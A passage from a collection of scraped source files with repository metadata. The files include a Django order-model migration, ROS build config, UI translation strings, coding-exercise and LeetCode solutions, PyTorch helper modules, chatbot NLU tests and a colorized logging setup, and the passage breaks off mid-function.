13a53613fcd588305d4af4cf3127fd1af004d65c | ba744a96d4c8fbcbaa15bcdbc5c3efe3860578b7 | /apps/trade/migrations/0001_initial.py | f030621112e685196238e8bb53928904d33295b9 | [] | no_license | zhangliang852469/Mx_shop_afterend | d84107887936baf122ed489de766f5d22958865b | 9d04de806d6ec87778f2ebe002459ee6a854915e | refs/heads/master | 2022-12-17T21:03:21.315285 | 2019-06-18T09:49:51 | 2019-06-18T09:49:51 | 192,023,209 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,744 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2019-06-13 07:36
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('goods', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='OrderGoods',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('add_time', models.DateTimeField(auto_now_add=True, verbose_name='添加时间')),
('update_time', models.DateTimeField(auto_now=True, verbose_name='更新时间')),
('is_delete', models.BooleanField(default=False, verbose_name='是否删除')),
('goods_num', models.IntegerField(default=0, verbose_name='商品数量')),
],
options={
'verbose_name': '订单商品',
'verbose_name_plural': '订单商品',
},
),
migrations.CreateModel(
name='OrderInfo',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('add_time', models.DateTimeField(auto_now_add=True, verbose_name='添加时间')),
('update_time', models.DateTimeField(auto_now=True, verbose_name='更新时间')),
('is_delete', models.BooleanField(default=False, verbose_name='是否删除')),
('order_sn', models.CharField(blank=True, max_length=30, null=True, unique=True, verbose_name='订单号')),
('trade_no', models.CharField(blank=True, max_length=100, null=True, unique=True, verbose_name='交易号')),
('pay_status', models.CharField(choices=[('TRADE_SUCCESS', '成功'), ('TRADE_CLOSED', '超时关闭'), ('WAIT_BUYER_PAY', '交易创建'), ('TRADE_FINISHED', '交易结束'), ('paying', '待支付')], default='paying', max_length=30, verbose_name='订单状态')),
('post_script', models.CharField(max_length=200, verbose_name='订单留言')),
('order_mount', models.FloatField(default=0.0, verbose_name='订单金额')),
('pay_time', models.DateTimeField(blank=True, null=True, verbose_name='支付时间')),
('address', models.CharField(default='', max_length=100, verbose_name='收货地址')),
('signer_name', models.CharField(default='', max_length=20, verbose_name='签收人')),
('singer_mobile', models.CharField(max_length=11, verbose_name='联系电话')),
],
options={
'verbose_name': '订单',
'verbose_name_plural': '订单',
},
),
migrations.CreateModel(
name='ShoppingCart',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('add_time', models.DateTimeField(auto_now_add=True, verbose_name='添加时间')),
('update_time', models.DateTimeField(auto_now=True, verbose_name='更新时间')),
('is_delete', models.BooleanField(default=False, verbose_name='是否删除')),
('nums', models.IntegerField(default=0, verbose_name='购买数量')),
('goods', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='goods.Goods', verbose_name='商品')),
],
options={
'verbose_name': '购物车',
'verbose_name_plural': '购物车',
},
),
]
| [
"710567585@qq.com"
] | 710567585@qq.com |
ca921fc2fbaabafea8ea8a27c3a5c456d9de049e | fa93e53a9eee6cb476b8998d62067fce2fbcea13 | /build/pal_simulation_msgs/catkin_generated/pkg.develspace.context.pc.py | ef59934517d574ec416e392bcf9c47a693ac42db | [] | no_license | oyetripathi/ROS_conclusion_project | 2947ee2f575ddf05480dabc69cf8af3c2df53f73 | 01e71350437d57d8112b6cec298f89fc8291fb5f | refs/heads/master | 2023-06-30T00:38:29.711137 | 2021-08-05T09:17:54 | 2021-08-05T09:17:54 | 392,716,311 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 600 | py | # generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "/home/sandeepan/tiago_public_ws/devel/.private/pal_simulation_msgs/include".split(';') if "/home/sandeepan/tiago_public_ws/devel/.private/pal_simulation_msgs/include" != "" else []
PROJECT_CATKIN_DEPENDS = "geometry_msgs;message_generation".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "pal_simulation_msgs"
PROJECT_SPACE_DIR = "/home/sandeepan/tiago_public_ws/devel/.private/pal_simulation_msgs"
PROJECT_VERSION = "0.13.4"
| [
"sandeepan.ghosh.ece20@itbhu.ac.in"
] | sandeepan.ghosh.ece20@itbhu.ac.in |
5f674d770f55421b0aea0d1f856866842bd347bc | 5b3090dece7d3d276922f53bfba18fdff3a5ba12 | /app/res/language/chinese.py | e1f1e471b598aca0a8ca550835d409bc133ca151 | [
"MIT"
] | permissive | HsOjo/PyJSONEditor | 338978b36a545982bec7285ba1de9aa5704f39b0 | c2cf5398fa569ba0575048f3deebbf23028a61a1 | refs/heads/master | 2020-06-30T00:35:40.215143 | 2019-10-15T11:27:01 | 2019-10-15T11:27:01 | 200,668,517 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,023 | py | from .english import English
class Chinese(English):
l_this = '简体中文'
unknown = '未知内容: (%s)'
cancel = '取消'
ok = '确定'
preferences = '偏好设置'
untitled = '未命名'
node_root = '根节点'
node_item = '项目'
node_items = '项目'
node_none = '(无)'
node_num = '(%d 个%s)'
col_key = '键'
col_type = '类型'
col_value = '值'
menu_file = '文件'
menu_new_file = '新建文件'
menu_open_file = '打开文件'
menu_save_file = '保存文件'
menu_save_file_as = '另存为...'
menu_save_file_all = '保存全部'
menu_close_file = '关闭文件'
menu_edit = '编辑'
menu_undo = '撤销'
menu_redo = '重做'
menu_cut = '剪切'
menu_copy = '复制'
menu_paste = '粘贴'
menu_find = '查找'
menu_replace = '替换'
menu_view = '视图'
menu_previous_file = '上一个文件'
menu_next_file = '下一个文件'
menu_languages = '选择语言'
| [
"1134031392@qq.com"
] | 1134031392@qq.com |
a6e1433feed00f513880cc74887b39790b9279f6 | 6f255449d5790a1124ca56bec0e3dc457c1b3958 | /final-exam/z5103095.files/question_1.py | 8d913a44608897cd62ed013f3c4b56efdd012829 | [] | no_license | tomtang110/comp9021 | ac8995f3f558ffdfff7af76a08c67e208fe26aa4 | 6c9e6404f515a72bc94a185c1c98d5aba49266c8 | refs/heads/master | 2020-03-23T18:56:41.177586 | 2018-07-24T04:56:23 | 2018-07-24T04:56:23 | 141,943,053 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,854 | py | from random import seed, randint
import sys
def f(arg_for_seed, nb_of_elements, max_element):
'''
>>> f(0, 0, 10)
Here is L: []
The decomposition of L into longest sublists of even numbers is: []
>>> f(0, 1, 10)
Here is L: [6]
The decomposition of L into longest sublists of even numbers is: [[6]]
>>> f(0, 2, 10)
Here is L: [6, 6]
The decomposition of L into longest sublists of even numbers is: [[6, 6]]
>>> f (0, 2, 2)
Here is L: [1, 1]
The decomposition of L into longest sublists of even numbers is: []
>>> f(1, 2, 10)
Here is L: [2, 9]
The decomposition of L into longest sublists of even numbers is: [[2]]
>>> f(1, 4, 10)
Here is L: [2, 9, 1, 4]
The decomposition of L into longest sublists of even numbers is: [[2], [4]]
>>> f(1, 8, 8)
Here is L: [2, 1, 4, 1, 7, 7, 7, 6]
The decomposition of L into longest sublists of even numbers is: [[2], [4], [6]]
>>> f(1, 10, 20)
Here is L: [4, 18, 2, 8, 3, 15, 14, 15, 20, 12]
The decomposition of L into longest sublists of even numbers is: [[4, 18, 2, 8], [14], [20, 12]]
'''
if nb_of_elements < 0:
sys.exit()
seed(arg_for_seed)
L = [randint(0, max_element) for _ in range(nb_of_elements)]
print('Here is L:', L)
R = []
# Insert your code here
R2=[]
L_len=len(L)
for i in L:
if i%2 == 0:
R2.append(i)
else:
if R2 != []:
R.append(R2)
R2=[]
R.append(R2)
for each in R:
if each==[]:
R.remove([])
print('The decomposition of L into longest sublists of even numbers is:', R)
if __name__ == '__main__':
import doctest
doctest.testmod()
| [
"tomtang110@outlook.com"
] | tomtang110@outlook.com |
336358a0ad3cb966e795d63dcf4df7dc65bebfd0 | b4ddc954a7dc0d24352de64a567c10c9e7231eee | /LeetCode/Find_The_Highest_Altitude.py | 5aa48147d753e47d66b4ede34758f663c816763b | [] | no_license | sharadbhat/Competitive-Coding | 4d80c99093bf05a2213799c95467309cf3e40d07 | 79eec04cc6b1ac69295530bda1575ecb613a769e | refs/heads/master | 2023-07-05T02:25:33.397140 | 2023-06-27T05:38:12 | 2023-06-27T05:38:12 | 78,031,600 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 279 | py | # Leetcode
# https://leetcode.com/problems/find-the-highest-altitude/
class Solution:
def largestAltitude(self, gain: List[int]) -> int:
maximum = curr = 0
for i in gain:
curr += i
maximum = max(curr, maximum)
return maximum
| [
"sharad.mbhat@gmail.com"
] | sharad.mbhat@gmail.com |
79e334c49ed3d3a075006d71c996f566dcc982ef | 2c4efe2ce49a900c68348f50e71802994c84900a | /braindecode-master/braindecode/torch_ext/modules.py | 57a1d4161d2312d7d0d5b863cd63e97d67fa9f82 | [
"BSD-3-Clause",
"BSD-2-Clause"
] | permissive | sisi2/Masterthesis | b508632526e82b23c2efb34729141bfdae078fa0 | 7ce17644af47db4ad62764ed062840a10afe714d | refs/heads/master | 2022-11-19T15:21:28.272824 | 2018-08-13T15:02:20 | 2018-08-13T15:02:20 | 131,345,102 | 2 | 1 | null | 2022-11-15T14:08:07 | 2018-04-27T21:09:21 | Python | UTF-8 | Python | false | false | 4,098 | py | import numpy as np
import torch
import torch.nn.functional as F
from braindecode.torch_ext.util import np_to_var
class Expression(torch.nn.Module):
"""
Compute given expression on forward pass.
Parameters
----------
expression_fn: function
Should accept variable number of objects of type
`torch.autograd.Variable` to compute its output.
"""
def __init__(self, expression_fn):
super(Expression, self).__init__()
self.expression_fn = expression_fn
def forward(self, *x):
return self.expression_fn(*x)
def __repr__(self):
if (hasattr(self.expression_fn, 'func') and
hasattr(self.expression_fn, 'kwargs')):
expression_str = "{:s} {:s}".format(
self.expression_fn.func.__name__,
str(self.expression_fn.kwargs))
else:
expression_str = self.expression_fn.__name__
return (self.__class__.__name__ + '(' +
'expression=' + str(expression_str) + ')')
class AvgPool2dWithConv(torch.nn.Module):
"""
Compute average pooling using a convolution, to have the dilation parameter.
Parameters
----------
kernel_size: (int,int)
Size of the pooling region.
stride: (int,int)
Stride of the pooling operation.
dilation: int or (int,int)
Dilation applied to the pooling filter.
"""
def __init__(self, kernel_size, stride, dilation=1):
super(AvgPool2dWithConv, self).__init__()
self.kernel_size = kernel_size
self.stride = stride
self.dilation = dilation
self.weights = None
def forward(self, x):
# Create weights for the convolution on demand:
# size or type of x changed...
in_channels = x.size()[1]
weight_shape = (in_channels, 1,
self.kernel_size[0], self.kernel_size[1])
if self.weights is None or (
(tuple(self.weights.size()) != tuple(weight_shape)) or (
self.weights.is_cuda != x.is_cuda
) or (
self.weights.data.type() != x.data.type()
)):
n_pool = np.prod(self.kernel_size)
weights = np_to_var(
np.ones(weight_shape, dtype=np.float32) / float(n_pool))
weights = weights.type_as(x)
if x.is_cuda:
weights = weights.cuda()
self.weights = weights
pooled = F.conv2d(x, self.weights, bias=None, stride=self.stride,
dilation=self.dilation,
groups=in_channels,)
return pooled
class IntermediateOutputWrapper(torch.nn.Module):
"""Wraps network model such that outputs of intermediate layers can be returned.
forward() returns list of intermediate activations in a network during forward pass.
Parameters
----------
to_select : list
list of module names for which activation should be returned
model : model object
network model
Examples
--------
>>> model = Deep4Net()
>>> select_modules = ['conv_spat','conv_2','conv_3','conv_4'] # Specify intermediate outputs
>>> model_pert = IntermediateOutputWrapper(select_modules,model) # Wrap model
"""
def __init__(self, to_select, model):
if not len(list(model.children()))==len(list(model.named_children())):
raise Exception('All modules in model need to have names!')
super(IntermediateOutputWrapper, self).__init__()
modules_list = model.named_children()
for key, module in modules_list:
self.add_module(key, module)
self._modules[key].load_state_dict(module.state_dict())
self._to_select = to_select
def forward(self,x):
# Call modules individually and append activation to output if module is in to_select
o = []
for name, module in self._modules.items():
x = module(x)
if name in self._to_select:
o.append(x)
return o
| [
"dansyefila@gmail.com"
] | dansyefila@gmail.com |
c4fe238528f8bb4be22c782626032f888f42d1e7 | 74f8d8c8030ce0c8cd3622cb99f0a668ba93a7e8 | /dialogue-engine/test/programytest/aiml_tests/nlu_tests/test_nlu_slot.py | 0b797c7c29de2c01824c888d826a4eee3e344040 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | Tommytosik/cotoba-agent-oss | 3124a376ac0ca1147a58405a8f269a0eb68bc014 | 78e5c2c244b92e71755783d972228904c4d0d373 | refs/heads/master | 2022-12-08T15:44:27.731731 | 2020-08-04T08:36:41 | 2020-08-04T08:36:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,774 | py | """
Copyright (c) 2020 COTOBA DESIGN, Inc.
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import unittest
import os
import json
from src.programy.nlu.nlu import NluRequest
from src.programy.storage.stores.file.store.config import FileStoreConfiguration
from src.programy.storage.factory import StorageFactory
from programytest.client import TestClient
class DummyNlu(NluRequest):
def set_request_api(self, api):
pass
def nluCall(self, client_context, url, apikey, utternce):
nlu_result_a = """{
"intents": [
{"intent": "transportation", "score":
"""
nlu_result_b = """}
],
"slots": [
{"slot": "departure", "entity": "東京", "score": 0.85, "startOffset": 3, "endOffset": 5 },
{"slot": "arrival", "entity": "京都", "score": 0.86, "startOffset": 8, "endOffset": 10 }
]
}
"""
nlu_result = nlu_result_a + ' ' + apikey + nlu_result_b
json_data = json.loads(nlu_result, encoding='utf_8')
result = json.dumps(json_data)
return result
class NluSlotTestClient(TestClient):
def __init__(self, aiml_file, score):
self._aiml_file = aiml_file
self._score = score
TestClient.__init__(self)
def load_storage(self):
super(NluSlotTestClient, self).load_storage()
self.add_default_stores()
aimlfile = os.path.dirname(__file__) + os.sep + self._aiml_file
self._file_store_config._categories_storage = FileStoreConfiguration(dirs=aimlfile, format="xml", extension="aiml", encoding="utf-8", delete_on_start=False)
self.storage_factory._storage_engines[StorageFactory.CATEGORIES] = self._storage_engine
self.storage_factory._store_to_engine_map[StorageFactory.CATEGORIES] = self._storage_engine
bot_config = self.configuration.client_configuration.configurations[0]
brain_config = bot_config._brain_configs[0]
brain_config.nlu._classname = 'programytest.aiml_tests.nlu_tests.test_nlu_slot.DummyNlu'
brain_config.nlu._url = 'http://test_nlu.co.jp'
brain_config.nlu._apikey = self._score
brain_config.nlu._use_file = False
class NluSlotTests(unittest.TestCase):
def test_nluslot(self):
client = NluSlotTestClient('nlu_slot.aiml', '0.9')
self._client_context = client.create_client_context("testid")
self.assertIsNotNone(self._client_context.brain.nlu)
response = self._client_context.bot.ask_question(self._client_context, "Match NLU")
self.assertIsNotNone(response)
self.assertEqual(response, "NLU result東京.")
def test_nluslot_with_tag(self):
client = NluSlotTestClient('nlu_slot.aiml', '0.8')
self._client_context = client.create_client_context("testid")
self.assertIsNotNone(self._client_context.brain.nlu)
response = self._client_context.bot.ask_question(self._client_context, "Match NLU")
self.assertIsNotNone(response)
self.assertEqual(response, "NLU result東京.")
def test_nluslot_with_index(self):
client = NluSlotTestClient('nlu_slot.aiml', '0.7')
self._client_context = client.create_client_context("testid")
self.assertIsNotNone(self._client_context.brain.nlu)
response = self._client_context.bot.ask_question(self._client_context, "Match NLU")
self.assertIsNotNone(response)
self.assertEqual(response, "NLU result unknown.")
def test_nluslot_wildcard(self):
client = NluSlotTestClient('nlu_slot.aiml', '0.6')
self._client_context = client.create_client_context("testid")
self.assertIsNotNone(self._client_context.brain.nlu)
response = self._client_context.bot.ask_question(self._client_context, "Match NLU")
self.assertIsNotNone(response)
self.assertEqual(response, "NLU result東京.")
def test_nluslot_widcard_with_index(self):
client = NluSlotTestClient('nlu_slot.aiml', '0.5')
self._client_context = client.create_client_context("testid")
self.assertIsNotNone(self._client_context.brain.nlu)
response = self._client_context.bot.ask_question(self._client_context, "Match NLU")
self.assertIsNotNone(response)
self.assertEqual(response, "NLU result京都.")
def test_nluslot_invlid_name(self):
client = NluSlotTestClient('nlu_slot.aiml', '0.4')
self._client_context = client.create_client_context("testid")
self.assertIsNotNone(self._client_context.brain.nlu)
response = self._client_context.bot.ask_question(self._client_context, "Match NLU")
self.assertIsNotNone(response)
self.assertEqual(response, "NLU result unknown.")
| [
"cliff@cotobadesign.com"
] | cliff@cotobadesign.com |
019cbaa07ad0766032c2a89bc17316db464fda96 | fc20620a1fe41c83cb4c17ce36e5d3e6d5dd58fa | /src/python/dicomifier/bruker_to_dicom/modules/__init__.py | 8505c3863b861b74d2df358cc07af97daa8ae843 | [
"LicenseRef-scancode-cecill-b-en"
] | permissive | lamyj/dicomifier | bdd3ad5756563365fe59a31166cbcaa14f98603f | 8601760917f7ef47d87fbd61d2c647c3d9cbeb3e | refs/heads/master | 2023-04-28T15:45:52.571809 | 2023-04-20T15:50:03 | 2023-04-20T15:50:03 | 32,533,252 | 33 | 11 | NOASSERTION | 2022-09-12T16:53:20 | 2015-03-19T16:28:40 | Python | UTF-8 | Python | false | false | 763 | py | #########################################################################
# Dicomifier - Copyright (C) Universite de Strasbourg
# Distributed under the terms of the CeCILL-B license, as published by
# the CEA-CNRS-INRIA. Refer to the LICENSE file or to
# http://www.cecill.info/licences/Licence_CeCILL-B_V1-en.html
# for details.
#########################################################################
def cached(key):
""" Cache the results of a conversion in the data set.
"""
def wrapper(function):
def wrapped(d,g,i):
if key not in d:
d[key] = function(d,g,i)
return d[key]
return wrapped
return wrapper
from . import equipment, frame_of_reference, image, mr, patient, series, study
| [
"lamy@unistra.fr"
] | lamy@unistra.fr |
834701c6886d9fc50ad7caaac9114177ec009c26 | cfb4e8721137a096a23d151f2ff27240b218c34c | /mypower/matpower_ported/lib/t/t_scale_load.py | cfcda91b7bde4b86375aa3eeedd50b764ef7a0b3 | [
"Apache-2.0"
] | permissive | suryo12/mypower | eaebe1d13f94c0b947a3c022a98bab936a23f5d3 | ee79dfffc057118d25f30ef85a45370dfdbab7d5 | refs/heads/master | 2022-11-25T16:30:02.643830 | 2020-08-02T13:16:20 | 2020-08-02T13:16:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 159 | py | def t_scale_load(*args,nout=3,oc=None):
if oc == None:
from ....oc_matpower import oc_matpower
oc = oc_matpower()
return oc.t_scale_load(*args,nout=nout)
| [
"muhammadyasirroni@gmail.com"
] | muhammadyasirroni@gmail.com |
fc55491fbed4cacbf6017d6389f90e8d5df11cb8 | 6534d071078db552573aa7ad7fd66c6beba15f35 | /rexlex/log_config.py | bd5fdccc5e69dda40c0cdb90e7422d3f05e81111 | [
"BSD-3-Clause"
] | permissive | twneale/rexlex | 7f40f4db30485d409ec5ceea3fb1053cbdf81e95 | 6c451a3b7e9134cbdf895a7ec5682e480480ef1a | refs/heads/master | 2021-01-20T11:06:17.888743 | 2017-01-22T03:59:14 | 2017-01-22T03:59:14 | 18,271,416 | 1 | 1 | BSD-3-Clause | 2018-03-05T00:40:18 | 2014-03-30T19:11:41 | Python | UTF-8 | Python | false | false | 7,091 | py | '''
Establish custom log levels for rexlexer's verbose output.
'''
import logging
from rexlex.config import LOG_MSG_MAXWIDTH
# ---------------------------------------------------------------------------
# Establish custom log levels.
# ---------------------------------------------------------------------------
# Used to report tokens getting yielded.
REXLEX_TRACE_RESULT = 9
# Used to report starting, stopping, etc.
REXLEX_TRACE_META = 8
# Used to report changes to lexer state.
REXLEX_TRACE_STATE = 7
# Used to report on specific rules.
REXLEX_TRACE_RULE = 6
# Used to dump as much info as possible.
REXLEX_TRACE = 5
REXLEX_LOG_LEVELS = (
(REXLEX_TRACE_RESULT, 'REXLEX_TRACE_RESULT', 'rexlex_trace_result'),
(REXLEX_TRACE_META, 'REXLEX_TRACE_META', 'rexlex_trace_meta'),
(REXLEX_TRACE_STATE, 'REXLEX_TRACE_STATE', 'rexlex_trace_state'),
(REXLEX_TRACE_RULE, 'REXLEX_TRACE_RULE', 'rexlex_trace_rule'),
(REXLEX_TRACE, 'REXLEX_TRACE', 'rexlex_trace'),
)
for loglevel, loglevel_name, method_name in REXLEX_LOG_LEVELS:
logging.addLevelName(loglevel, loglevel_name)
def rexlex_trace_result(self, message, *args, **kws):
if self.isEnabledFor(REXLEX_TRACE_RESULT):
self._log(REXLEX_TRACE_RESULT, message, args, **kws)
setattr(logging.Logger, 'rexlex_trace_result', rexlex_trace_result)
def rexlex_trace_meta(self, message, *args, **kws):
if self.isEnabledFor(REXLEX_TRACE_META):
self._log(REXLEX_TRACE_META, message, args, **kws)
setattr(logging.Logger, 'rexlex_trace_meta', rexlex_trace_meta)
def rexlex_trace_state(self, message, *args, **kws):
if self.isEnabledFor(REXLEX_TRACE_STATE):
self._log(REXLEX_TRACE_STATE, message, args, **kws)
setattr(logging.Logger, 'rexlex_trace_state', rexlex_trace_state)
def rexlex_trace_rule(self, message, *args, **kws):
if self.isEnabledFor(REXLEX_TRACE_RULE):
self._log(REXLEX_TRACE_RULE, message, args, **kws)
setattr(logging.Logger, 'rexlex_trace_rule', rexlex_trace_rule)
def rexlex_trace(self, message, *args, **kws):
if self.isEnabledFor(REXLEX_TRACE):
self._log(REXLEX_TRACE, message, args, **kws)
setattr(logging.Logger, 'rexlex_trace', rexlex_trace)
# ---------------------------------------------------------------------------
# Colorize them.
# ---------------------------------------------------------------------------
#
# Copyright (C) 2010-2012 Vinay Sajip. All rights reserved.
# Licensed under the new BSD license.
#
import ctypes
import logging
import os
class ColorizingStreamHandler(logging.StreamHandler):
# color names to indices
color_map = {
'black': 0,
'red': 1,
'green': 2,
'yellow': 3,
'blue': 4,
'magenta': 5,
'cyan': 6,
'white': 7,
}
#levels to (background, foreground, bold/intense)
if os.name == 'nt':
level_map = {
REXLEX_TRACE: (None, 'blue', True),
REXLEX_TRACE_RULE: (None, 'white', False),
REXLEX_TRACE_STATE: (None, 'yellow', True),
REXLEX_TRACE_META: (None, 'red', True),
REXLEX_TRACE_RESULT: ('red', 'white', True),
}
else:
level_map = {
REXLEX_TRACE: (None, 'blue', False),
REXLEX_TRACE_RULE: (None, 'white', False),
REXLEX_TRACE_STATE: (None, 'yellow', False),
REXLEX_TRACE_META: (None, 'red', False),
REXLEX_TRACE_RESULT: ('red', 'white', True),
}
csi = '\x1b['
reset = '\x1b[0m'
@property
def is_tty(self):
# bluff for Jenkins
if os.environ.get('JENKINS_URL'):
return True
isatty = getattr(self.stream, 'isatty', None)
return isatty and isatty()
def emit(self, record):
try:
message = self.format(record)
stream = self.stream
if not self.is_tty:
stream.write(message)
else:
self.output_colorized(message)
stream.write(getattr(self, 'terminator', '\n'))
self.flush()
except (KeyboardInterrupt, SystemExit):
raise
except:
self.handleError(record)
if os.name != 'nt':
def output_colorized(self, message): # NOQA
self.stream.write(message)
else:
import re
ansi_esc = re.compile(r'\x1b\[((?:\d+)(?:;(?:\d+))*)m')
nt_color_map = {
0: 0x00, # black
1: 0x04, # red
2: 0x02, # green
3: 0x06, # yellow
4: 0x01, # blue
5: 0x05, # magenta
6: 0x03, # cyan
7: 0x07, # white
}
def output_colorized(self, message): # NOQA
parts = self.ansi_esc.split(message)
write = self.stream.write
h = None
fd = getattr(self.stream, 'fileno', None)
if fd is not None:
fd = fd()
if fd in (1, 2): # stdout or stderr
h = ctypes.windll.kernel32.GetStdHandle(-10 - fd)
while parts:
text = parts.pop(0)
if text:
write(text)
if parts:
params = parts.pop(0)
if h is not None:
params = [int(p) for p in params.split(';')]
color = 0
for p in params:
if 40 <= p <= 47:
color |= self.nt_color_map[p - 40] << 4
elif 30 <= p <= 37:
color |= self.nt_color_map[p - 30]
elif p == 1:
color |= 0x08 # foreground intensity on
elif p == 0: # reset to default color
color = 0x07
else:
pass # error condition ignored
ctypes.windll.kernel32.SetConsoleTextAttribute(h,
color)
def colorize(self, message, record):
if record.levelno in self.level_map:
bg, fg, bold = self.level_map[record.levelno]
params = []
if bg in self.color_map:
params.append(str(self.color_map[bg] + 40))
if fg in self.color_map:
params.append(str(self.color_map[fg] + 30))
if bold:
params.append('1')
if params:
message = ''.join((self.csi, ';'.join(params),
'm', message, self.reset))
return message
def format(self, record):
message = logging.StreamHandler.format(self, record)
if self.is_tty:
# Don't colorize any traceback
parts = message.split('\n', 1)
parts[0] = self.colorize(parts[0], record)
message = '\n'.join(parts)
return message
| [
"twneale@gmail.com"
] | twneale@gmail.com |
752dd8866e161902f3d6aac9099c7dfaea881ff2 | b299e95c1660aeb9933d83b15689d39e3af60456 | /www_douyin_com/config.py | 5a60a49447d372f7bfce14b609fd8a28db5669ab | [] | no_license | beckfun/spider_world | 537e700ec84e00efb18fbe4c78ace18f0fe54151 | 06a39872d7dfaf1421b19dbed78ad3c8139f0a19 | refs/heads/master | 2020-05-04T09:06:19.995407 | 2019-04-02T01:19:48 | 2019-04-02T01:19:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,268 | py | #!/usr/bin/env python
# coding:utf-8
DEFALUT_REQ_TIMEOUT = 5
MAX_RETRY_REQ_TIMES = 3
RETRY_RANDON_MIN_WAIT = 1000 # ms
RETRY_RANDON_MAX_WAIT = 5000 # ms
COMMON_HEADERS = {"User-Agent": "okhttp/3.10.0.1"}
APPINFO = {
"version_code": "290",
"app_version": "2.9.0",
"version_name": "2.9.0",
"device_platform": "android",
"ssmix": "a",
"device_type": "ONEPLUS+A5000",
"device_brand": "OnePlus",
"language": "zh",
"os_api": "28",
"os_version": "9",
"manifest_version_code": "290",
"resolution": "1080*1920",
"dpi": "420",
"update_version_code": "2902",
"_rticket": "1548672388498",
"channel": "wandoujia_zhiwei",
"app_name": "aweme",
"build_number": "27014",
"aid": "1128",
"ac": "WIFI",
}
COMMON_COOKIES = {
'ttreq': '1$f58a422877af68a234141b2dc94eda292d8cd901',
'sid_guard': '190e1d75900416b7eb62c639d7fe653a%7C1548671527%7C5184000%7CFri%2C+29-Mar-2019+10%3A32%3A07+GMT',
'uid_tt': '51289fc385905048dbc45575efead7d5',
'sid_tt': '190e1d75900416b7eb62c639d7fe653a',
'sessionid': '190e1d75900416b7eb62c639d7fe653a',
'odin_tt': "d44fbf1baf710b502070386558b48c94250edc24497a85f029c3cbef046cf706d27692be6295813ef3c6ca20dfa2a405d2d4a0d169224c3f65a1b55e18d33bf7"
}
| [
"funblessu@gmail.com"
] | funblessu@gmail.com |
3c4f26b39fa995a853f94619629f1d94f6dcdd2c | a3b4db7fce646268abf3763cbc105534febf8713 | /Functional Programming/functional_programming_filter.py | 45f3803e0403c755328e910f72f8270ffe5360fd | [
"MIT"
] | permissive | brianchiang-tw/Python_Toolbox | 5d50df67153ef62a05595da17aebc66f570eddb4 | 9fed9c8734745f8998bc178694b0bdb780142a89 | refs/heads/master | 2020-11-24T21:35:47.099063 | 2019-12-24T11:52:39 | 2019-12-24T11:52:39 | 228,350,097 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 945 | py | def demo_filter():
num_list = list( range(1, 11) )
## Example_#1:
# pick even number
result = list( filter( lambda x:x%2==0, num_list) )
# [2, 4, 6, 8, 10]
print( result )
## Example_#2:
# pick odd number
result = list( filter( lambda x:x%2==1, num_list) )
# [1, 3, 5, 7, 9]
print( result )
## Example_#3:
# pick mutliplier of 3
result = list( filter( lambda x:x%3==0, num_list) )
# [3, 6, 9]
print( result )
str_list = ["Apple", "Banana", "cat", "dog", "elephant"]
## Example_#4:
# pick word with word length is 3
result = list( filter( lambda s: len(s)==3, str_list) )
# ['cat', 'dog']
print( result )
## Example_#4:
# pick word with all character in lower case
result = list( filter( lambda s: s.islower(), str_list) )
# ['cat', 'dog', 'elephant']
print( result )
if __name__ == '__main__':
demo_filter()
| [
"brianchiang1988@icloud.com"
] | brianchiang1988@icloud.com |
9281e896a60cfa26ef19185971c84b694854a02d | 5c099927aedc6fdbc515f40ff543c65b3bf4ec67 | /algorithms/symmetric-tree/src/Solution.py | 3c4be730abd0ef2e7a6b6f156a31cef45ad5def5 | [] | no_license | bingzhong-project/leetcode | 7a99cb6af1adfbd9bb1996a7f66a65679053c478 | ba82e7d94840b3fec272e4c5f82e3a2cfe4b0505 | refs/heads/master | 2020-04-15T09:27:33.979519 | 2020-03-10T03:43:07 | 2020-03-10T03:43:07 | 164,550,933 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,354 | py | # Definition for a binary tree node.
class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution:
def isSymmetric(self, root):
"""
:type root: TreeNode
:rtype: bool
"""
def symmetric(paths):
i, j = 0, len(paths) - 1
while i <= j:
if paths[i] != paths[j]:
return False
i += 1
j -= 1
return True
res = True
if root is None:
return res
queue = list()
queue.append(root)
last = queue[-1]
paths = list()
while len(queue) > 0:
